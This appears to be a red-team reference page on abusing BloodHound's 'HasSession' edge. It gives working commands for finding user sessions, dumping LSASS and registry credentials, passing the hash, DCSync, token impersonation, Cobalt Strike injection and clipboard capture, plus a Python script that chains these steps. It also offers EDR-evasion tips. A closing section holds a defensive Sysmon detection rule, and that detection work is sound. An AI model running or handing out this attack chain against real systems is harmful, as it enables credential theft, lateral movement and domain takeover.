HasSession

The target user has an active logon session on the computer at the source end of the edge. With local admin on that computer you can harvest the user's credentials from LSASS or impersonate the user's token.

Applies to: Computer → User (attacker has local admin on the Computer; the target User has a session there)


Linux Abuse

Step 1: Identify sessions (BloodHound / NetExec)

# Find where the target user has sessions. Needs a valid domain account; newer Windows builds
# restrict NetSessionEnum to administrators by default, so a low-privileged account may see nothing
netexec smb <subnet>/24 -u <username> -p '<password>' -d <domain> --sessions

# If the HasSession edge came from BloodHound, the computer is already known: skip to Step 2

Step 2: Dump credentials on the session host

# Registry-based dump from the remote machine (requires local admin). This reads SAM, LSA secrets
# and cached domain logons (DCC2), not LSASS memory: a logged-on domain user's NT hash is not in
# here, and DCC2 hashes must be cracked, they cannot be passed
secretsdump.py '<domain>/<username>:<password>@<session-computer>'
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<username>@<session-computer>'

# Dump LSASS for the logged-on user's NT hash and Kerberos material (this is what HasSession gives you)
netexec smb <session-computer> -u <username> -p '<password>' -d <domain> -M lsassy
netexec smb <session-computer> -u <username> -H '<ntlm-hash>' -d <domain> -M nanodump
netexec smb <session-computer> -u <username> -p '<password>' -d <domain> -M procdump

Step 3: Use the recovered hash for lateral movement

# Pass the hash as the target user (-hashes takes LM:NT; leave LM empty)
wmiexec.py -hashes ':<target-ntlm-hash>' '<domain>/<target-user>@<target-host>'
evil-winrm -i <dc-ip> -u <target-user> -H '<target-ntlm-hash>'
# DCSync only works if the target user holds replication rights on the domain
secretsdump.py -hashes ':<target-ntlm-hash>' '<domain>/<target-user>@<dc-ip>' -just-dc-ntlm
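The three Linux steps above, chained into one script: pick the hosts where the target user has a session, build the LSASS-dump command for each, pull the target's NT hash out of the module output, and build the pass-the-hash command. This is an added example, not NetExec or impacket code. SAMPLE_SESSIONS and SAMPLE_LSASSY are constructed to resemble NetExec output (the column layout, and therefore SESSION_RE and HASH_RE, are assumptions to adjust against real output), and the hosts, the corp.local domain and the hash values are made up. Commands are assembled as argv lists and only executed when run() is called with dry_run=False.

```python
"""Chain HasSession abuse from the Linux side (added example, not tool code)."""
import re
import shlex
import subprocess

# One NetExec --sessions line: "SMB <ip> 445 <host> \\<client>  User: <DOM\user>" (assumed layout)
SESSION_RE = re.compile(r"^SMB\s+(?P<ip>\S+)\s+445\s+(?P<host>\S+)\s+.*User:\s*(?P<user>\S+)")
# One lsassy result line: "... DOM\user  <LM>:<NT>" (assumed layout)
HASH_RE = re.compile(
    r"(?P<domain>[^\\\s]+)\\(?P<user>\S+)\s+(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32})", re.I
)

SAMPLE_SESSIONS = """\
SMB  10.10.10.21  445  WS01  [*] Enumerated sessions
SMB  10.10.10.21  445  WS01  \\\\10.10.10.5   User: CORP\\jdoe
SMB  10.10.10.22  445  WS02  \\\\10.10.10.9   User: CORP\\svc_backup
SMB  10.10.10.23  445  FS01  [-] Error enumerating sessions
"""  # constructed

SAMPLE_LSASSY = """\
LSASSY  10.10.10.21  445  WS01  CORP\\jdoe   aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
LSASSY  10.10.10.21  445  WS01  CORP\\WS01$  aad3b435b51404eeaad3b435b51404ee:1cdf8a4b3a26f5a8b5e61a5b5b7c0f5a
"""  # constructed


def hosts_with_session(output, target_user):
    """Hostnames (in order, deduplicated) where target_user has a session."""
    hosts = []
    for line in output.splitlines():
        m = SESSION_RE.match(line)
        if not m:
            continue
        user = m.group("user").split("\\")[-1]  # drop DOMAIN\ prefix if present
        if user.lower() == target_user.lower() and m.group("host") not in hosts:
            hosts.append(m.group("host"))
    return hosts


def lsassy_cmd(host, domain, user, secret, secret_is_hash=False):
    """netexec ... -M lsassy, authenticating with -H for an NT hash or -p for a password."""
    auth = ["-H", secret] if secret_is_hash else ["-p", secret]
    return ["netexec", "smb", host, "-u", user, *auth, "-d", domain, "-M", "lsassy"]


def nt_hash_for(output, target_user):
    """NT hash of target_user from lsassy output, or None if the user was not in LSASS."""
    for line in output.splitlines():
        m = HASH_RE.search(line)
        if m and m.group("user").lower() == target_user.lower():
            return m.group("nt").lower()
    return None


def pth_cmd(domain, target_user, nt_hash, target_host):
    """wmiexec.py pass-the-hash argv; impacket's -hashes wants LM:NT, LM left empty."""
    if not re.fullmatch(r"[0-9a-f]{32}", nt_hash):
        raise ValueError(f"not an NT hash: {nt_hash!r}")
    return ["wmiexec.py", "-hashes", f":{nt_hash}", f"{domain}/{target_user}@{target_host}"]


def plan_dumps(sessions_output, domain, user, secret, target_user, secret_is_hash=False):
    """One lsassy command per host where the target user currently has a session."""
    return [lsassy_cmd(h, domain, user, secret, secret_is_hash)
            for h in hosts_with_session(sessions_output, target_user)]


def run(cmd, dry_run=True):
    """Print the command; execute it and return stdout only when dry_run is False."""
    print(shlex.join(cmd))
    if dry_run:
        return ""
    return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    # Step 1 + 2: dump LSASS wherever jdoe is logged on (dry run against constructed output)
    for cmd in plan_dumps(SAMPLE_SESSIONS, "corp.local", "locadmin", "Winter2024!", "jdoe"):
        run(cmd)
    # Step 3: take jdoe's NT hash from the (constructed) lsassy output and pass it
    nt = nt_hash_for(SAMPLE_LSASSY, "jdoe")
    run(pth_cmd("corp.local", "jdoe", nt, "DC01"))
```

Note that hosts_with_session filters on the bare username, so a machine account line such as CORP\WS01$ never matches a user target, and nt_hash_for returns None rather than a wrong hash when the target is absent from the dump, which is the usual result when the session data from Step 1 has gone stale.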

Windows Abuse

Find target sessions (PowerView)

# Find where high-value users have sessions (Invoke-UserHunter is the pre-2016 PowerView name of the same function)
Find-DomainUserLocation -UserIdentity <target-user>
Invoke-UserHunter -UserName <target-user>

Token impersonation (Invoke-TokenManipulation)

# List available tokens on current system
Invoke-TokenManipulation -Enumerate

# Impersonate target user token
Invoke-TokenManipulation -ImpersonateUser -Username '<domain>\<target-user>'

# Create process with target token
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username '<domain>\<target-user>'

Credential dump on session host (Mimikatz)

# Needs an elevated (high-integrity) admin context; fails from a medium-integrity shell
mimikatz # privilege::debug
# NT hashes and Kerberos keys of every logged-on user, the target included
mimikatz # sekurlsa::logonpasswords
# Cleartext only if UseLogonCredential=1; WDigest caching is off by default since 8.1 / 2012 R2
mimikatz # sekurlsa::wdigest

Process injection into target user's process

# Identify the target user's processes (-IncludeUserName needs an elevated shell)
Get-Process -IncludeUserName | Where-Object { $_.UserName -like '*<target-user>*' }

# Inject via Cobalt Strike
inject <PID> x64 <listener>

Keylogging / clipboard capture

# PowerSploit clipboard monitor
Invoke-ClipboardMonitor -CollectionLimit 10

Opsec

  • Opening a handle to LSASS is what EDR and Sysmon key on (Sysmon Event ID 10 ProcessAccess; Security 4656 only if a SACL has been set on LSASS). Direct/indirect syscall dumpers such as nanodump get past user-mode hooks, not kernel callbacks; duplicating an existing handle or a fork-and-dump variant avoids opening a new one
  • privilege::debug / sekurlsa::logonpasswords need SeDebugPrivilege from a high-integrity process; a non-elevated admin shell fails until UAC is bypassed
  • Token impersonation (T1134) of an existing logon creates no new logon session, so there is no 4624 for it; 4624 logon type 9 (NewCredentials) flags make_token / runas /netonly instead. Hunt for 4688 / Sysmon 1 where the process user differs from the parent's
  • Session hunting (Invoke-UserHunter / Find-DomainUserLocation) queries every host over SMB, noisy on the wire; -Stealth limits it to likely servers (file servers, DCs), while -CheckAccess adds an admin check per host and does not reduce traffic
  • Session data goes stale quickly, but users tend to log on from the same workstation, so re-check the same host before moving on
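A detection counterpart for the first Opsec bullet: a rule over Sysmon Event ID 10 (ProcessAccess) records that flags handles to lsass.exe opened with memory-reading rights by images outside an allowlist, and notes when the call stack passes through unbacked memory. This is an added example, not from the page or from any vendor rule set. The records in SAMPLE_EVENTS use the real Sysmon field names (SourceImage, TargetImage, GrantedAccess, CallTrace) but constructed paths, version strings and addresses; ALLOWLIST is an assumption to tune per environment.

```python
"""Flag suspicious LSASS handle opens in Sysmon EID 10 records (added example)."""
from fnmatch import fnmatchcase

# Process access rights (winnt.h) that let a caller read LSASS memory directly,
# or get there indirectly via handle duplication or a process clone.
RIGHTS = {
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
}

# Lower-cased glob patterns of images expected to touch lsass (assumption; tune per environment).
ALLOWLIST = [
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\programdata\microsoft\windows defender\platform\*\msmpeng.exe",
]

SAMPLE_EVENTS = [  # constructed records, real Sysmon field names
    {"SourceImage": r"C:\Users\jdoe\Downloads\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe",
     "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d0e4|C:\Users\jdoe\Downloads\mimikatz.exe+1c2f3"},
    {"SourceImage": r"C:\Temp\procdump64.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe",
     "GrantedAccess": "0x1fffff",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d0e4|C:\Temp\procdump64.exe+2a10"},
    {"SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe",
     "GrantedAccess": "0x1410",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d0e4|C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\mpengine.dll+4f2a1"},
    {"SourceImage": r"C:\Windows\system32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe",
     "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d0e4|C:\Windows\system32\svchost.exe+1234"},
    {"SourceImage": r"C:\Windows\explorer.exe",  # implant in explorer running a syscall dumper
     "TargetImage": r"C:\Windows\system32\lsass.exe",
     "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d0e4|UNKNOWN(000001F2A5C01234)"},
    {"SourceImage": r"C:\Windows\system32\taskmgr.exe",
     "TargetImage": r"C:\Windows\system32\svchost.exe",
     "GrantedAccess": "0x1fffff",
     "CallTrace": ""},
]


def classify(event):
    """Return (verdict, reason) with verdict one of 'alert', 'allow', 'ignore'."""
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return "ignore", "target is not lsass.exe"
    granted = int(event["GrantedAccess"], 16)
    hit = [name for bit, name in RIGHTS.items() if granted & bit]
    if not hit:
        # e.g. 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION): cannot read memory, very common, benign
        return "ignore", f"GrantedAccess=0x{granted:x} carries no memory-read capable right"
    source = event["SourceImage"].lower()
    if any(fnmatchcase(source, pattern) for pattern in ALLOWLIST):
        return "allow", f"{event['SourceImage']} is allowlisted"
    reason = f"{event['SourceImage']} opened lsass with 0x{granted:x} ({'|'.join(hit)})"
    if "UNKNOWN(" in event.get("CallTrace", ""):
        # Sysmon renders frames in unbacked memory as UNKNOWN(addr): typical of injected code
        reason += "; call stack passes through unbacked memory"
    return "alert", reason


def run_detection(events):
    """List of (SourceImage, reason) for every record that alerts."""
    alerts = []
    for event in events:
        verdict, reason = classify(event)
        if verdict == "alert":
            alerts.append((event["SourceImage"], reason))
    return alerts


if __name__ == "__main__":
    for source, reason in run_detection(SAMPLE_EVENTS):
        print(f"ALERT {source}: {reason}")
```

Sysmon records ProcessAccess from a kernel object callback, so a dumper that uses direct or indirect syscalls to get around user-mode EDR hooks still produces the event (the explorer.exe record above). What does sidestep it is not opening a fresh handle at all, by duplicating one that lsass or another process already holds, or by cloning the process, which is why PROCESS_DUP_HANDLE and PROCESS_CREATE_PROCESS are treated as interesting rights alongside PROCESS_VM_READ. The 0x1000-only access from svchost.exe shows the other side of the tuning: rights that cannot read memory are noise and are dropped before the allowlist is even consulted.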